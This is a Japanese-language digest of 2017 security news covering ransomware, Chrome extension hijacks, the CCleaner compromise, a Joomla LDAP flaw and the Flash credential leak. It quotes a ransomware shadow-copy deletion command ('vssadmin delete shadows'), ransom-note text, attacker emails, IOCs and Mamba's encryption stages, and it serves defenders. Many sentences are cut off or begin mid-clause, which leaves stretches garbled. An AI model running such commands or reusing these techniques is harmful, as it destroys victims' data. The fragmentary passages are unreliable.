 「Facelikerは、ユーザが悪意ある、あるいはセキュリティ侵害されたWebサイトを訪問した時、ユーザのブラウザに感染する。次に、Facebookアカウントをハイジャックするので、ユーザは、あるコンテンツを「いいね」と思ってクリックしているつもりでも、このマルウェアはそのクリックをリダイレクトする。これは、ユーザの認識も同意もなく、別の「いいね」ボタンを代わりにクリックしたことになるので、本質的に各ユーザはクリック詐欺の共犯者にさせられてしまう。」
 このような行動は、彼らの製品の評判を高める目的で、彼らの「サービス」をコンテンツ・クリエーターに販売しているFacelikerハンドラーを勢いづかせることになる。
発見されたマルウェア中のFacelikerの百分率(【訳注】 横軸 Q2-17 は、2017年第二四半期の意味)
 Facelikerの増加は十分厄介である。しかし、利益を生み出す機会を与えられたので、この脅威が近いうちに去ることは絶対にないだろうと、McAfee Labsの副社長Vincent Weaferは考えている。
 「Facelikerは、ソーシャルメディアや、今日ますます広まっているアプリケーションベースのコミュニケーションを活用し巧みに操作している。アプリケーションや新しい記事を作成することは、より一般的になっており、受け入れられ、友人間で当然の事になっているようなので、未知の行動者は、価値や真実さえ見抜く方法に、こっそり、影響を与えることができる。」
 Facelikerのような脅威を防御するには、ユーザは、彼らがオンラインでどのようなサイトを訪問しているのか、どのようなリソースから、そのWebでホストされているファイルをダウンロードしていのかに用心する訓練をすべきである。彼らはまた、彼らのパスワードを盗む能力のあるマルウェアを防止する手段として、Facebookアカウントや、他のソーシャルメディア・プロファイルを二要素認証 で間違いなく保護すべきである。
8年間、ハッカーはJoomla中のパスワードを盗むことのできるフローを悪用可能だった  Bitdefender : Hot For Security (2017/09/25) 先週リリース されたJoomla v3.8でパッチされた)は、ドイツのセキュリティ企業RIPS Techによって公開 された。
 LDAPクエリーに使用されるユーザ名認証のインプット・サニタリゼーションの欠如は、敵対者がLDAP検索結果のセットを改竄することを可能にする。ワイルドカード文字の使用や様々な認証エラーメッセージを観察することによって、攻撃者は、文字列毎に認証を推測するペイロードの列を送信することで、徐々にログイン認証をまさに検索することができる。
 攻撃が成功すると、ハッカーは管理者のログイン認証を盗むことができるようになり、Webサイトは完全に制御されることになる。
EternalBlue脆弱性攻撃プログラムがRetefeバンキング・トロイに使用されていた  Kaspersky : ThreatPost (2017/09/22) 米国国家安全保障局(NSA)が作成した脆弱性攻撃プログラムEternalBlue の使用を追加していた。調査 を説明している。CVE-2017-0144 )に対する完全なパッチを間違いなく適用するように促している。「企業は、IDS(Intrusion Detection System、不正侵入検知)システムとファイアーウォールで関連するトラフィックをブロックし、eMailゲートウェイで悪意あるメッセージをブロックすべきである」とProofpointは追加している。
DDoS攻撃脅迫グループが数千の企業に身代金の要求を送信している  BleepingComputer : News>Security (2017/09/22) Derrick Farmer によって最初に発見された。この脅威は9月19日に開始され、以降継続中のようである。
ハッカーは僅か700$の身代金を探している 
 このeMailは一つの簡単な脅迫(企業に0.2 Bitcoin(~720$)を支払うように、さもなければ、9月30日に彼らのWebサイトを停止させる準備をすると告げている)を含んでいる。
Phantom Squad DDoS脅迫eMailのサンプル 
 通常、このようなeMailによる脅迫は、受信した企業が支払わない場合に、脅迫者が攻撃を実行するために、一企業ずつ僅かな数の企業に対して送信される。
脅迫者達は頭の回転がよろしくない 
 このeMailスパムの波の大きさは、多くの専門家を驚かせた。その衝撃は、直ちにソーシャルメディア[1 、2 、3 、4 ]とWebマスターフォーラム (システム管理者が、脅威を取り扱う方法に関する支援と意見を探しに行く場所)上の反応となって現れた。
脅迫者達はeMailテキストを「再利用」している 
 Radwareの技術陣は類似のレポートを受け取ったので、この会社は独自のセキュリティ警告 を発行したほどである。1 、2 ])ではない可能性があると指摘している。2017年6月 にArmada Collectiveの名前を使用した別の脅迫者グループが使用したものと殆ど同一であることに気が付いた。DDoS攻撃の脅威を介して企てられたこの脅迫もまた、単なる脅しであることが証明された。それであるにも拘わらず、幾つかは成功した。Anonimousの名前で知られる偽のRDoS(【訳注】 Ransom DDoS、DDoS攻撃を伴うサイバー脅迫)グループ は、幾つかの銀行に100 Bitcoinの身代金を要求していた」と、SmithはBleeping Computerに告げた。
専門家たちは、このグループがDDoS攻撃を起動できるとは信じていない 
 これはransom DDoS (RDoS、DDoS攻撃を伴うサイバー脅迫)攻撃の漸次的な進歩(グループは、業種内部の少数の企業グループをターゲットにすることから、複数の企業から少額の支払いを引き出すことを期待して多数のターゲットに移行している)を示している。ツイート した)によっても共有されている。
犠牲者は当局に脅迫行為を通報すべし 
 Japan CERT(JPCERT、一般社団法人 JPCERT コーディネーションセンター)は、当局に、このeMailを通報してもらうことによって、インチキの要求の取り扱い方法を企業に通知するために、セキュリティ警告 をリリースした。
CCleanerマルウェア重大事故。あなたが知る必要のあることと、削除方法  BleepingComputer : News>Security (2017/09/18) これ以上はないCCleanerに関する報道 を読みなさい。
何が起きたのか? 
 未知の悪しきグループがCCleanerの基盤をセキュリティ侵害した。
誰が感染したのか? 
 上記期間に影響を受けたバージョンをダウンロードしインストールした全ての人々。
どのようにすれば感染したことが分かるのか? 
 CCleanerの感染させられたバージョンをインストールすると、HKEY_LOCAL_MACHINE\SOFTWARE\Piriform\Agomo にレジストリのキーが作成される。このキーの下に、MUID と TCIDと名付けられた二つのDate値が存在する。これは、インストールされたFloxif感染によって使用される。
セキュリティ侵害されたCCleanerによって作成されたレジストリ キー
 Registry Editorを使用してAgomoキーに移動し、これらのキーが存在しているか否か確認しなさい。存在しているのであれば、あなたは、このマルウェアに感染している。
アップグレード後も存在しているレジストリ キー
Floxifマルウェアは何を実行するのか? 
 Floxifと名付けられているこのマルウェアは、感染したコンピュータから、コンピュータ名、インストールされているソフトウェアのリスト、稼働プロセスのリスト、最初の3つのネットワーク・インターフェース用のMACアドレス、各コンピュータをある程度同定する一意のIDのようなデータを収集する。
FloxitもしくはCCleanerマルウェアを、どのように削除するのか? 
 このマルウェアは、CCleaner実行ファイルそれ自体に埋め込まれている。CCleanerを v5.34にアップデートすると今迄の実行ファイルとマルウェアは削除される。CCleanerは自動アップデートシステムを持っていないので、ユーザは、CCleaner 5.34を手動でダウンロードしインストールする必要がある。
他に何か? 
 このマルウェアは、ユーザが管理者権限を使用している場合だけ実行される。あなたが低い権限のアカウントを使用して CCleaner 5.33 をインストールしたのであれば、あなたは感染していない。あなたがWindows 7 Home Premiumを実行している場合は、あなたのメイン・アカウントは十中八九、管理者権限である。そして、あなたが、このバージョンのCCleanerをインストールしたのであれば、感染していると考えるべきである。
何故アンチウィルス・ソフトは、この感染を捕獲できなかったのか? 
 マルウェアを含むCCleanerのバイナリは正当なデジタル証明書を使用して署名されていた。
研究者は、決してパッチされない虞のあるD-Linkルータのセキュリティホールを明らかにした  Sophos : Naked Security (2017/09/12) D-Link DIR-850L AC1200 Dual Band Gigabit Cloudルータ を持っているのであれば、我々は、幾つかの面であなたにとって悪いニュースを持っている。不快な詳細中にそれらの存在を今明らかにした ので、厳密には最早真実ではない(0-Dayは、公開されていないい未パッチのフローである)。
 基本的に、すべてのものLANからWANまでセキュリティ侵害されていた。カスタムMyDlinkクラウド・プロトコルでさえ乱用されていた。
 これらは以下を含む:
・ 攻撃者が新しいイメージをアップロードすることを可能にするrevAハードウェア用ルータのファームウェアに関する保護の欠乏。revAは、ハードコードされたパスワードを持っている。
 これは、D-Linkが製品セキュリティでトップニュースになった最初のことではない。Naked Securityは、最近数回レポート(DIR-820L での2015問題と、CVE-2017-6206 に指定された2017年始めからのフローの集まりを含む)した。IPカメラとルータ中のフローを修正 しないと、この会社が主張したことに関して米国連邦取引委員会が提訴したこと)。
Excelを嫌うもう一つの理由: Excelのマクロは攻撃をピボットする事を支援する  The Register : Security (2017/09/12) 発見した と記述している。これは、マクロベースの攻撃が、その犠牲者と対話する必要がないことを意味している。
ピボット(Pivot)に関する参考資料(McAfee > Secureingtomorrowより) 
1. 直接攻撃は大変多くの証拠を残す
Paradise身代金要求型マルウェアは、ファイルの暗号化にRSA暗号化を使用している  BleepingComputer : News>Security (2017/09/11) Paradise Ransomware Support Topic を使用しなさい。
Paradise身代金要求型マルウェアはRansomware as a Service (RaaS)かもしれない 
 Paradise身代金要求型マルウェアはRansomware as a Service (RaaS)であるかのように見える。RaaSは、身代金要求型マルウェアの開発者が身代金要求型マルウェアを作成し、その開発を管理し、犠牲者によって支払われた全身代金の一部と引き換えにCommand and Control(C&C、コマンドアンドコントロール)サーバを運用するものである。支払われた身代金の残りを得る提携者の仕事は、彼らが適切とする身代金要求型マルウェアをディストリバイトすることである。
tankpolice@aolonline.top
Paradise身代金要求型マルウェアは、どのようにコンピュータを暗号化するのか 
 現時点で、Paradiseがコンピュータに感染する方法は未知であるが、感染したコンピュータのイベントログから、ハッキングされたリモートデスクトップサービス経由の可能性がある。けれども、一旦実行されると、Paradiseは、管理者特権を取得するためにそれ自体を再起動し、次に、一意のRSA-1024キーを生成する。このキーは、そのコンピュータ上の各ドライブにあるファイルの全てを暗号化するために使用される。
Paradiseで暗号化されたフォルダ
 Paradiseはファイルの暗号化にRSA暗号化を使用するので、暗号化プロセスは非常に緩慢である。これは希望的には、暗号化が実行されている生け贄になっている時間を検出し、その停止を可能にする。
Paradise身代金要求型マルウェアの脅迫文
 Paradiseは次に、Base64でエンコードされた壁紙画像を抽出し、それをdesk.bmpとして%Temp%フォルダに保存する。この身代金要求型マルウェアは次に、この画像を犠牲者のデスクトップ背景画像として設定する。
Paradise身代金要求型マルウェアのデスクトップ背景画像
 最終的に、この身代金要求型マルウェアは犠牲者のファイルを暗号化するために使用したRSA暗号化キーを%UserProfile%\DecriptionInfo.authファイルに書き込む。このファイルは次に、この身代金要求型マルウェア実行ファイルに同梱されているマスター暗号化キーによって暗号化される。これは、犠牲者が身代金を支払った後に、犠牲者に一意のRSAキーを、この開発者が抽出することを可能にするためである。
IOCs 
Hashes: 
Paradise身代金要求型マルウェア関連ファイル: 
Paradise身代金要求型マルウェアNote Text: 
[WHAT HAPPENED]
Your important files produced on this computer have been encrypted due a security problem
[FREE DECRYPTION AS GUARANTEE]
Before paying you can send to us up to 3 files for free decryption.
[HOW TO OBTAIN BITCOINS]
The easiest way to buy bitcoin is LocalBitcoins site.
[ATTENTION]
Do not rename encrypted files
関連Email: 
tankpolice@aolonline.top
MicrosoftはEdgeブラウザのコンテンツ・セキュリティ・バイパスの脆弱性をパッチしない  The Register : Security (2017/09/07) コチラ にMicrosoftの対応のニュースを投稿している。iOS 10.3より後のDittoユーザと、10.1より後のSafariユーザは、CVE-2017-2419の損害を無しで済ませられる。しかしながら、Tarosは、「Microsoftは、これは設計によるものであり、この問題をパッチしないと宣言した」と記述している。
・ インライン・スクリプト・コード("unsafe-inline"命令)を可能にするためにContent-Security-Policy(CSP)を設定する。
 悪用されると、攻撃者は、他のサイトにコンタクトするためにJavaScriptを使用することができる。そして。それはロードされたドキュメントと同一の生成元を持っているので、CSPに制限されることなく動作する。説明 として、CSPの仕様は、「制限は継承されなければならない」(生成元のページに適用されているあらゆる制限は、それから開かれたページに適用されなければならない)ことは明らかである。
Windows Kernel中のバグはセキュリティソフトがマルウェアを同定することを妨げている  BleepingComputer : News>Security (2017/09/07) 
このバグは過去17年間にリリースされた全てのWindowsバージョンに影響する 
 この問題は、enSilo社(【訳注】 サンフランシスコを本拠とするサイバーセキュリティ企業)の研究者が、Windows Kernelのコードを解析していた今年初めに光を当てられていた。Omri Misgav(enSiloの研究者で、この問題の発見者の一人)は、このバグがWindows 2000以降リリースされた全てのWindowsのバージョンに影響を与えると発言している。
Microsoftは、これをセキュリティ問題として見做していなかった 
 今まさに、この大問題は、セキュリティソフトウェアが悪意あるオペレーションの幾つかのタイプを検出するために、この方法に依存しているということにある。PsSetLoadImageNotifyRoutineの動作方法 と、このバグが標準(想定されている挙動)を変更する方法の細部を詳細に説明している。
6年前の"loop bug"は、殆ど全てのメジャーなPDFビューアに影響を与えることが再発見された  BleepingComputer : News>Security (2017/09/04) Chaos Communication Camp で彼の発見は提示された。
6年前のバグは、一般的なPDFビューア中に再浮上した 
 6年後、この問題は、Bockが多くの著名なPDFビューア中に類似の挙動を発見した後、大問題となった。PDFium (Chromeが、あらゆるプラグイン無しで、ブラウザ内部にPDFドキュメントをレンダリングすることを可能にしているライブラリ)中にBogkの"loop"バグを発見した。影響を受ける 。pdf.jsは、ユーザがPDFファイルをダウンロードし、サードパーティのアプリケーション内部にそれを表示する必要なく、Webサイトのインターフェース内部で、PDFドキュメントをレンダリングするためにGitHubでも使用されている。GitHubの実装もまた、そのサイト上でのPDFの表示を破壊し無限ループになる脆弱性が存在している。Ghostscript やQPDF のような類似のオープンソースPDFパーサーもまた影響を受ける。これは、この問題が十中八九これら二つのプロジェクトを配備している多くの他のWebとデスクトップPDFビューアに流れ落ちることを意味している。
Adobe Readerは影響を受けない 
 
Adobe ReaderとApple OS X組み込みのPDFビューアは影響を受けない。大ファン であり、彼らのアドバイスを聞くことに興味のあるあらゆる者に、このテクニックを推奨していた。デモファイル を追加するように推奨している 。
巨大なLocky身代金要求型マルウェア キャンペーンは、24時間に2300万のeMailを送信していた  GrahamCluley : Blog (2017/09/01) 
AppRiverによって注目されたLocky攻撃eMailの一つ
 言うまでもなく、この添付ファイルを開くことにした受信者にとって良いことは何も発生しない。AppRiverのTroy Gillは、以下の点を明らかにしている 。
 「各メッセージは二つ目のZIPファイルを内部にネスト(入れ子)しているVisual Basic Script (VBS)ファイルを含むZIP添付ファイルを搭載している。クリックすると、VBSファイルは、最新のLocky身代金要求型マルウェアをダウンロードするためにgreatesthits[dot]mygoldmusic[dotcom]にアクセスするダウンローダを初期化する。Lockyは、ターゲット・システム上のファイルの全てを暗号化し、そのユーザの暗号化されたファイルに[.]lukitus拡張子を追加する。」
 暗号化のルーティーンが終了すると、Lockyは、.onionポータルにリンクした脅迫文を表示した。このサイトを訪問した犠牲者は、Locky Decryptorとして知られる「特別なソフトウェア」と引き換えに 0.5Bitcoin(凡そ 2,413.50 USD、24万円ほど)を支払うように求める脅迫文を見ることになる。
Lockyマルウェア キャンペーンの .onionポータル
 このキャンペーン(最近の記憶の中では、Locky搭載eMailの突然の急増は、これだけではない )は、3時間の間に560万を超えるeMailが計測された。その総数は、翌日にまたがり、2300万を越える攻撃メッセージに跳ね上がった。チョットした歴史 がある。Lockyを真似て独自の株 を作成する犯罪者は言うまでもなく、様々な寿命の身代金要求型マルウェアの脅威のを見るだろう。そうは言うものの、ユーザは今行動し、頑健なデータバックアップ計画を今策定 し....、遅くなってしまう前に。幾つかのヒント が此処にある。
別のバンキング・トロイが、あなたの仮想通貨ウォレット(財布)を略奪しようとしている  The Register : Security (2017/08/30) 最新のTrickbot変種 のターゲットの一つである仮想通貨交換サイト)は、複数の仮想通貨を管理しているが、結果として、サイバー犯罪者が、そのアカウント証明を収穫することに成功した場合には、彼らが、乱用するための広汎なプラットフォームを提供することになっていた。情報セキュリティ企業Forcepoint Securityは、標的として、このトロイ(すでに、世界中の多くのプロバイダーの銀行口座を略奪しようとしている)に関する設定ファイルにCoinbaseを追加したと、レポートしている。遡る が、F-SecureはBitcoin WALLET.DATを検索するトロイを捕獲している。
Arena Crysis身代金要求型マルウェアの新しい変種がリリースされた  BleepingComputer : News>Security (2017/08/25) Michael Gillespie は、暗号化したファイルに .arena 拡張子を追加するCrysis/Dharma身代金要求型マルウェアの新しい変種を発見した。この変種がどのように拡散しているのか正確には知られていないが、今まで、Crysisは、一般的にはRemote Desktop Services中に不正に侵入することで拡散してきた。
Crysis Arena身代金要求型マルウェアの変種で暗号化されたファイル
 コンピュータが暗号化されると、このマルウェアは、シャドウ・ボリューム・コピーの全てを削除するので、あなたはファイルの復元にシャドウ・ボリューム・コピーを使用することはできない。このマルウェアは、vssadmin  delete shadows /all /quiet コマンドを実行することでシャドウ・ボリューム・コピーを削除する。
Crysis Arenaの脅迫文(クリックすると画像は拡大されます)
 もう一つの脅迫文は、FILES ENCRYPTED.txtと名付けられている。
FILES Encrypted脅迫文
 これら二つの脅迫文は、支払いの指示を与えるために chivas@aolonline.top にコンタクトするための指示を含んでいる。
Crysis Arena身代金要求型マルウェアの変種で暗号化されたファイルを復号することは不可能 
 残念ながら、この時点で、 Crysis身代金要求型マルウェアで暗号化された .arena ファイルを無料で復号することは不可能である。シャドー・ボリューム・コピーから暗号化されたファイルの復元を 試みるよう人々に提案している。Crysis Ransomware Help & Support Topic を使用することができる。
Crysis身代金要求型マルウェアから自分自身を守るための方法 
 Crysisから、あるいは、あらゆる身代金要求型マルウェアから自分自身を保護するためには、適切なコンピューター操作の習慣とセキュリティソフトウェアを使用することが重要である。何よりもまず、緊急の事態(身代金要求型マルウェア攻撃のような)に際して復元可能な、あなたのデータの信頼あるテスト済みのバックアップを常に持つようにすることである。Emsisoft Anti-Malware やMalwarebytes のような挙動検知を含むセキュリティ ソフトウェアを持たなければならない。
・ バックアップ、バックアップ、バックアップ
 身代金要求型マルウェア防御に関する完全ガイドに関しては、我々のHow to Protect and Harden a Computer against Ransomware の記事を訪問しなさい。
IOCs 
Hash 
Arena Crysis身代金要求型マルウェアのFILES ENCRYPTED.TXT脅迫文 
Arena Crysis身代金要求型マルウェアのINFO.hta脅迫文 
FoxitがPDFリーダーをパッチすることを拒否した後、二つの0-Dayの脆弱性が明らかにされた  GrahamCluley : Blog (2017/08/21) CVE-2017-10951 )は、このソフトウェアのapp.launchURLメソッドがシステムコールを実行する前に、ユーザによって提供された文字列を適切に認証していないことによるものである。CVE-2017-10952 )は、ユーザ提供データの不適切な認証に起因しているが、それどころか、saveAs JavaScript関数に影響を与えている。ステートメント で以下のように発言している。
 「Foxit ReaderとPhantomPDFは、JavaScriptの実行を制御するためにDefaultで有効になっているSafe Readingモードを持っている。そして、この機能は、認証されていないJavaScriptアクションが狙う潜在的な脆弱性を効果的に防御する」
 それはいいのだが、我々の多くは、毒性ペイロードの実行を可能にするために騙されて安全機能を無効化 している世間知らずのユーザを見てきており、このような攻撃を嫌というほど知っている。TechRadarのリスト をチェックしなさい。あなたが、これらのオプションの一つを選ぶことを決定したのなら、必ず独自の調査をしなさい。その製品が適切なセキュリティ・レコードを持っており、あなたの必要性を満足させることを確認する前に、いかなるものもダウロードしてはならない。
8つのChrome拡張がハイジャックされ、480万ユーザに悪意あるコードを配布していた  BleepingComputer : News>Security (2017/08/16) Copyfish とWeb Developer と名付けられている二つのChrome拡張がハイジャックされていることについてレポートした。この二つの場合、攻撃者は開発者を欺くためにフィッシングeMailを使用し、開発者達のChromeアカウントのログイン認証を手にしていた。
6つものChrome拡張がハイジャックされていた 
 昨日、巧みな追跡の後、セキュリティ研究者Kafeineは、同じ手口でハイジャックされていた6つものChrome拡張を同定した。このリストは以下を含んでいる。
 8つの拡張全てに関する全インストール数を加算すると、攻撃者達は凡そ480万ユーザに彼らの悪意あるコードの配布を何とか達成していた。レポート している。
攻撃者は広告を置き換える(侵入型ポップアップ)ことに集中していた 
 当初、このコードの解析は、大雑把なものであったが、我々は今、詳細な解析を持つことになった。幾つかのハイジャックされた拡張中に発見された悪意あるコードに関するKafeineの解析 に感謝する。
― ハイジャックされた拡張がインストールもしくはアップデートされた後、少なくとも10分待機する。
攻撃者は2016年6月以来攻勢をかけている 
 これら全ての行動は、攻撃者に少額の利益を得させていた。このフィッシングとハイジャック攻撃は、2017年5月に開始されたが、Kafeineは、2016年6月 に遡り、クッキー同意型スクリプトを介して悪意あるコードの配布を発見された悪意あるChrome拡張に対してこれら複雑な操作に使用された基礎構造の一部をリンクした。
Office脆弱性の悪用は、PowerPointのバリエーションとして新たな生命を得ている  BleepingComputer : News>Security (2017/08/15) 0-Day の脆弱性であった。この時点で 、攻撃者はHTAファイルをダウンロードし、次に、悪意あるJSコードを実行し、次に、様々なペイロードをインストールするために、このRTFファイルを使用した。研究者は、サイバースパイ・キャンペーンで、CVE-2017-0199がウクライナにおけるロシア支持の分離主義者を標的にするために使用されたことを確認しているが、平凡な金融マルウェア・キャンペーンでLatentbotバックドア トロイが配布されていたことも確認している。Cerber身代金要求型マルウェアを配布する ためにも使用された。
攻撃者はCVE-2017-0199を使用し、無残にも失敗している 
 昨日、CiscoとTrend Microは、サイバー犯罪者の間で、その人気を確認するために、この新しい脆弱性攻撃を使用している新たなキャンペーンに注目した。2016年に最も人気のあった脆弱性 であるCVE-2017-0199とを連結したグループによるものであった。Ciscoによると 、このグループは、マルウェアをインストールするためにHTAファイルをダウンロードするこれまで通りのRTFドキュメントを配布するスパムキャンペーンを実行している。
攻撃者はCVE-2017-0199を工夫して使っている 
 CVE-2017-0199のこれらの新しい攻撃の最初の段階は、貧弱な実装であった。この第二段階は非常に創造的であった。そして、マルウェア開発者達は、このOfficeのフローを悪用する新たな方法を考えだした。Remcos RAT をインストールするためにPPTXファイルを使用する。Trend Microは発言 している。ガイド を一緒に置いている。CVE-2017-0199用のセキュリティ アップデート を発行している。
最近パッチされたFlashのバグはWindows資格情報をリークする可能性がある  BleepingComputer : News>Security (2017/08/11) 今週初め 、Adobeは、攻撃者が悪意あるFlashファイルを使用してWindows資格情報をリークすることができるFlash Player中の脆弱性をパッチした。
以前の脆弱性に由来するフロー 
 この脆弱性は、オランダのセキュリティ研究者Ruytenbergによって発見され、そして、Adobeが2016年9月にパッチしたCVE-2016-4271として追跡されていた以前のフローのバリエーションである。その当時 、Ruytenbergは、彼が犠牲者を欺いてリモートSMBサーバにコールバックするFlashファイルをロードし、ユーザのコンピュータを欺いてその資格情報を奪う ことができることを発見していた。Flash Player 23.0.0.162のリリース で、このフローをパッチした。このパッチは、UNC(Universal Naming Convention(汎用命名規則), 例: \\10.0.0.1\some\file.txt)やファイルシステム・パス(file://///10.0.0.1/some/file.txt)で、URLへのあらゆるアウトバウンド接続をFlashにさせないようにするものであった。テクニカル・ブログ 中の説明によると、攻撃者は、HTTPやHTTPSを介してリモートサーバへのリクエストを作成するFlashファイルをロードすることで、UNCやファイルパスURLに関するAdobeの禁令に適合することができる。
SMBtrap output
攻撃はChromeやEdgeでは動作しない 
 Ruytenbergは、Office(2010, 2013, 2016), Firefox, Internet Explorer中でFlashファイルがロードされた時だけ、この攻撃が動作すると発言している。ChromeやEdgeのようなブラウザは、この攻撃の影響を受けない。
脆弱性は様々な方法で悪用される 
 Bleeping ComputerへのeMailで、Ruytenbergは、より詳細に可能性のある攻撃のシナリオを明らかにしている。
・ Web: 悪意あるペイロードをFlashアプリケーションに供給している(セキュリティ侵害された可能性のある)Webサイトを訪問すること。これは、サードパーティーのドメイン(悪意ある広告者からのもののような)を含む。 
Severity評価が低くとも見くびってはならない 
 この脆弱性は、CVSSのSeverityスコア4.3(10段階で) と評価されている。よく調べると、これは、あなたが悪意ある広告キャンペーンで見ている物のようには見えない。
Mamba身代金要求型マルウェアが回帰  Kaspersky : SecureList (2017/08/09) 
攻撃されている国 
 以下に位置する企業に対する攻撃を、我々は現在監視している。
Brazil
攻撃ベクトル 
 通常通り、このグループは組織のネットワークへのアクセスを取得し、この身代金要求型マルウェアを実行するためにPsExecを使用する。また、犠牲者のネットワーク中の夫々のマシンに関し、この脅威の執行者が、DiskCryptorユーティリティ用のパスワードを生成することに言及することは重要である。このパスワードは、この身代金要求型マルウェア ドロッパーにコマンドライン引数を介して渡される。
【訳者補注】 PsExec: PsExec は Telnet に代わる軽量のユーティリティで、クライアント ソフトウェアを手動でインストールしなくても、他のシステムでプロセスを実行できるだけでなく、コンソール アプリケーションとの十分な対話性も備わっています。PsExec の最も便利な用途には、たとえば、リモート システムで対話型のコマンド プロンプトを起動したり、ipconfig のようなリモートの実行に対応したツールを起動したりすることが挙げられます。PsExec で起動しない限り、そのようなツールにはリモート システムについての情報を表示する機能がありません。(Microsoft  Technetより)
マルウェア実行の例
技術的解析 
 一言で言えば、悪意ある挙動は二つのステージに分けることができる。
Stage 1(準備):
・ フォルダ “C:\xampp\http“ を作成する 
Stage 2(暗号化):
・ MBR(マスターブートレコード)にブートローダーをセットアップし、DiskCryptorソフトウェアを使用してディスクパーティションを暗号化する 
Stage 1(準備) 
 このトロイがDiskCryptorユーティリティを使用している時、第一段階は、犠牲者のマシンにこのツールをインストールする処理である。この悪意あるドロッパーは、彼ら独自のリソース中にDiskCryptorのモジュールを格納する。
DiskCryptorモジュール
 OS情報により、このマルウェアは、32もしくは64bitのDiskCryptorモジュールを選択することができるようになっている。この必須のモジュールは、"C:\xampp\http"フォルダにドロップされる。
このマルウェアは必須のモジュールをドロップする
 その後、ドロップされたDiskCryptorインストーラを起動する。
DiskCryptorインストーラの呼び出し
 DiskCryptorがインストールされると、このマルウェアは、SERVICE_ALL_ACCESS と SERVICE_AUTO_START パラメータを持つサービスを作成する。
悪意あるサービス関数の作成
 Stage 1の最後のステップは、このシステムを再起動することである。
強制再起動関数
Stage 2(暗号化) 
 DiskCryptorソフトウェアを使用することで、このマルウェアは、新しいブートローダをMBRにセットアップする。
MBRにブートローダーをセットアップするためのコール
 このブートローダーは犠牲者用の脅迫文を含んでいる。
脅迫文
 このブートローダーが設定されると、ディスクパーティションは、ドロッパー用のコマンドライン引数として今迄に特定されていたパスワードを使用して暗号化されるだろう。
暗号化プロセスのCall Tree(コールツリー)
 暗号化が終了すると、このシステムは再起動される、そして、犠牲者はこの画面上に脅迫文を見るだろう。
脅迫文
 Kaspersky Lab製品は、以下の決定(PDM:Trojan.Win32.Generic)でSystem Watcherの支援を得て、この脅威を検出する。
復号 
 残念なことに、この正当なDiskCryptorユーティリティは、強力な暗号化アルゴリズムを使用しているために、このユーティリティを使用して暗号化されたデータを復号する方法は存在しない。
IOCs 
79ED93DF3BEC7CD95CE60E6EE35F46A1
MicrosoftがOutlookとOffice用の定例外アップデートをリリースしている  Sophos : NakedSecurity (2017/08/07) 7月11日のアップデート (以前、そして依然としてPatch Tuesday(パッチの火曜日)として知られている)で多数のセキュリティパッチをリリースしたが、幾つかの定例外アップデートが7月27日にリリース されている。このアップデートは、具体的にはOutlookとOfficeのClick-to-run(クイック実行。【訳注】 Office をインストールするための時間を短縮し、複数のバージョンの Office を同じコンピューター上で実行できるように支援するMicrosoft のストリーミングおよび仮想化のテクノロジ(Microsoft Technetより))の脆弱性に適用されるものである。メジャーな攻撃ベクトル である。そして残念なことに、我々は始終、Officeユーザが攻撃者のターゲット になっていることを見ている。これは悲しいことにOfficeユーザにとって立証済みのことである。
Cerber身代金要求型マルウェアは、今やブラウザパスワード、Bitcoinウォレットデータを盗む  BleepingComputer : News>Security (2017/08/04) 
 Cerber身代金要求型マルウェアは、Infostealer(【訳注】 侵入先のコンピュータから機密情報を収集する有害なソフトウェア(Symantec日本より))のように、犠牲者のコンピュータからデータを収集し盗むことを可能にするアップデートを受け取った。
CerberはInfostealer機能を追加した 
 より正確には、Cerberは、Internet Explorer, Google Chrome, Mozilla Firefoxのようなブラウザ中に格納されているパスワードをダンプする。この二人の研究者 は発言している。
Cerberが初めてではない 
 CerberがInfostealer機能を搭載した最初の身代金要求型マルウェアではない。最初のものは、2015年4月にFireEyeによって停止させられた、Kriptovor と名付けられた身代金要求型マルウェア ファミリーである。Bitcoinウォレットデータを盗み 、その後、ブラウザ認証をダンプする ためのサポートを追加した。
SHA256 hash: 6c9f7b72c39ae7d11f12dd5dc3fb70eb6c2263eaefea1ff06aa88945875daf27
NPMへのタイポスクワッティング攻撃は2週間未検出のままだった  The Register : Security (2017/08/02) ブログへの投稿 に於いて、CJ Silverio(NPMのCTO)は、7月19日から31日までの間、アカウント名hacktaskが、人気のある既存のNPMパッケージに類似している名前の一連のパッケージを公開することでタイポスクワッティング攻撃を実施していたと発言している。cross-env を検索した人々をペテンに掛けるように設計されたcrossenvと名付けられたパッケージに悪意あるコードを発見した 。hacktaskによって登録 された「約40」のパッケージは、NPMから削除された。Lift Securityが、不正なパッケージ セットアップコードに関して全てのNPMパッケージをスキャンしたが、他に発見されたものはなかったと、彼女は発言している。僅かな参照 を返してくる。2016年のプレゼンテーション で、開発者Jeff Andrewsは、「私はNode.js/npmを使用している。どうすれば私は安全でいられるか?」という質問を彼自身に提示した。彼の答えは、「あなたは、できない。」であった。
バンキング・トロイは自己拡散型ワーム コンポーネントを追加している  BleepingComputer : News>Security (2017/07/28) 
Emotet 
 自己拡散コンポーネントを最初に呼び物にしたのは、Emotetトロイである。Fidelis とBarkly の研究者によって発見されたこのバンキング・トロイは、自己拡散用のRARファイルを感染したホストに投下し、これを検索に使用し、感染したホストのログインをブルートフォースすることによってローカルネットワーク リソースへのアクセスを取得する。
TrickBot 
 自己拡散するワームのようなモジュールの誇示を発見された二つ目のバンキング・トロイは、先月WebベースのCRMSとPayPalユーザ をターゲットにするように拡張されたTrickBotである。Flashpoint とDeloitte の研究者によって発見されたこのモジュールは、NetServerEnum Windows APIを介してサーバのリストがないかドメインを詳しく調べ、Lightweight Directory Access Protocol (LDAP)を介して他のコンピュータを列挙する。
Kevin BeaumontのTwitterへのリンク 
ShieldFSは、身代金要求型マルウェア感染の効果を停止し復帰させることができる  BleepingComputer : News>Security (2017/07/27) 
ShieldFSはCOW(Copy-On-Write)と暗号化操作のスキャナとして働く 
 今年公開された二つの研究論文[1 , 2 ]によると、ShieldFSは、Copy-On-Write(COW、書き換え時コピー。【訳注】 子プロセス生成時に親プロセスのメモリー空間を複製せず,書き込み処理が発生したときにはじめて複製する仕組み(ITproより))操作を検出するように設計された複雑なメカニズムである。
ShieldFSは自己回復ファイルシステムを使用して暗号化されたファイルを復元する 
 身代金要求型マルウェアが検出されると、ShieldFSは、そのプロセスを停止するように、そのオペレーティングシステムに信号を送る。そして、あらゆる身代金要求型マルウェアの悪意あるアクションを元に戻すためのカスタム ファイルシステムを使用している。コチラ (PDFフォーマット)から利用できる
活動中のShieldFSのビデオ:https://youtu.be/0UlgdnQQaLM 
